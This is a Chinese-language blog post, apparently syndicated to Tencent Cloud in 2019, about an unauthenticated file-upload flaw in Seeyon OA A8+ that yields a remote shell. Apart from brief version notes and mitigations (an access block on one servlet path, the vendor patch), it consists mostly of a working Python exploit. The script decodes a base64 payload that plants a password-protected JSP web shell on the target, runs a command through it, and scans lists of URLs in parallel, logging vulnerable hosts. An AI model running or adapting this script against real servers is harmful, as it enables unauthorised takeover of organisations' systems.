致远 OA A8 无需认证 Getshell 漏洞
致远互联旗下致远 A8+协同管理软件,存在远程 Getshell 漏洞。作为中国协同管理软件及云服务领先厂商,致远 A8+协同管理软件在国内拥有央企、大型公司都有广大的应用。 验证版本: A8+V7.0 SP3、A8+ V6.1 SP2 (V6.1 SP1 验证尚不存在,其他版本未验证) 触发条件:没有限制。 上述版本存在Getshell 漏洞。系统某处在无
致远互联旗下致远 A8+协同管理软件,存在远程 GETSHELL 漏洞。作为中国协同管理软件及云服务领先厂商,致远 A8+协同管理软件在国内拥有央企、大型公司都有广大的应用。
验证版本:
A8+V7.0 SP3、A8+ V6.1 SP2
(V6.1 SP1 验证尚不存在,其他版本未验证)
触发条件:没有限制。
上述版本存在GetShell 漏洞。系统某处在无需登录情况下可直接上传任意文件,攻击者一旦上传精心构造的后门文件即可 Getshell,获得目标服务器的权限。目前利用代码已在野外公开,官方提供的补丁程序仍然可利
用。
缓解措施:
1.通过 ACL 禁止外网对“/seeyon/htmlofficeservlet”路径的访问。
2、官方补丁
请尽快联系致远官方,索要官方补丁程序。
致远 OA A8 无需认证 Getshell 漏洞 Getshell 无需认证 A8 致远OA 安全工具 第1张
POC
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
import sys
import glob
import time
import base64
import requests
from urllib.parse import urlparse
from multiprocessing import Pool
def start(url):
if url[:4] != "http":
print(url.replace("\n", ""), " not is a url.")
return
url = list(urlparse(url))[0] + "://" + list(urlparse(url))[1]
print("[Testing] ", url)
ua = {"user-agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
payload = "REJTVEVQIFYzLjAgICAgIDM1NSAgICAgICAgICAgICAwICAgICAgICAgICAgICAgNjY2ICAgICAgICAgICAgIERCU1RFUD1PS01MbEtsVg0KT1BUSU9OPVMzV1lPU1dMQlNHcg0KY3VycmVudFVzZXJJZD16VUNUd2lnc3ppQ0FQTGVzdzRnc3c0b0V3VjY2DQpDUkVBVEVEQVRFPXdVZ2hQQjNzekIzWHdnNjYNClJFQ09SRElEPXFMU0d3NFNYekxlR3c0VjN3VXczelVvWHdpZDYNCm9yaWdpbmFsRmlsZUlkPXdWNjYNCm9yaWdpbmFsQ3JlYXRlRGF0ZT13VWdoUEIzc3pCM1h3ZzY2DQpGSUxFTkFNRT1xZlRkcWZUZHFmVGRWYXhKZUFKUUJSbDNkRXhReVlPZE5BbGZlYXhzZEdoaXlZbFRjQVRkTjFsaU40S1h3aVZHemZUMmRFZzYNCm5lZWRSZWFkRmlsZT15UldaZEFTNg0Kb3JpZ2luYWxDcmVhdGVEYXRlPXdMU0dQNG9FekxLQXo0PWl6PTY2DQo8JUAgcGFnZSBsYW5ndWFnZT0iamF2YSIgaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiIHBhZ2VFbmNvZGluZz0iVVRGLTgiJT48JSFwdWJsaWMgc3RhdGljIFN0cmluZyBleGN1dGVDbWQoU3RyaW5nIGMpIHtTdHJpbmdCdWlsZGVyIGxpbmUgPSBuZXcgU3RyaW5nQnVpbGRlcigpO3RyeSB7UHJvY2VzcyBwcm8gPSBSdW50aW1lLmdldFJ1bnRpbWUoKS5leGVjKGMpO0J1ZmZlcmVkUmVhZGVyIGJ1ZiA9IG5ldyBCdWZmZXJlZFJlYWRlcihuZXcgSW5wdXRTdHJlYW1SZWFkZXIocHJvLmdldElucHV0U3RyZWFtKCkpKTtTdHJpbmcgdGVtcCA9IG51bGw7d2hpbGUgKCh0ZW1wID0gYnVmLnJlYWRMaW5lKCkpICE9IG51bGwpIHtsaW5lLmFwcGVuZCh0ZW1wKyJcbiIpO31idWYuY2xvc2UoKTt9IGNhdGNoIChFeGNlcHRpb24gZSkge2xpbmUuYXBwZW5kKGUuZ2V0TWVzc2FnZSgpKTt9cmV0dXJuIGxpbmUudG9TdHJpbmcoKTt9ICU+PCVpZigiYXNhc2QzMzQ0NSIuZXF1YWxzKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJwd2QiKSkmJiEiIi5lcXVhbHMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSl7b3V0LnByaW50bG4oIjxwcmU+IitleGN1dGVDbWQocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKSArICI8L3ByZT4iKTt9ZWxzZXtvdXQucHJpbnRsbigiOi0pIik7fSU+NmU0ZjA0NWQ0Yjg1MDZiZjQ5MmFkYTdlMzM5MGQ3Y2U="
req = requests.post(url + '/seeyon/htmlofficeservlet', headers=ua, data=base64.b64decode(payload))
req = requests.get(url + '/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+Miko')
if "Miko" in req.text:
print("[Vulnerability]", url)
download("vuln.txt", url.replace("\n", ""))
else:
return url
def read_file(path):
if not os.path.exists("urls.txt"):
print("Please check file.", path)
return
file = open(path, "r")
lines = file.readlines()
file.close()
return lines
def download(filename, data):
filename = filename.replace("/", "_")
if not os.path.exists(filename):
f = open(filename, "w")
f.close()
with open(filename, "a") as f:
f.write(str(data) + "/seeyon/test123456.jsp?pwd=asasd3344&cmd=cmd%20+/c+echo+Miko\n")
def main():
pool = Pool()
paths = [*sys.argv,][1:]
if not paths:
paths = [input('[+] Please input path:')]
for path in paths:
path = glob.glob(path)
for url in path:
urls = read_file(url)
pool.map(start, [url for url in urls])
if __name__ == "__main__":
main()本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2019-06-27),如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
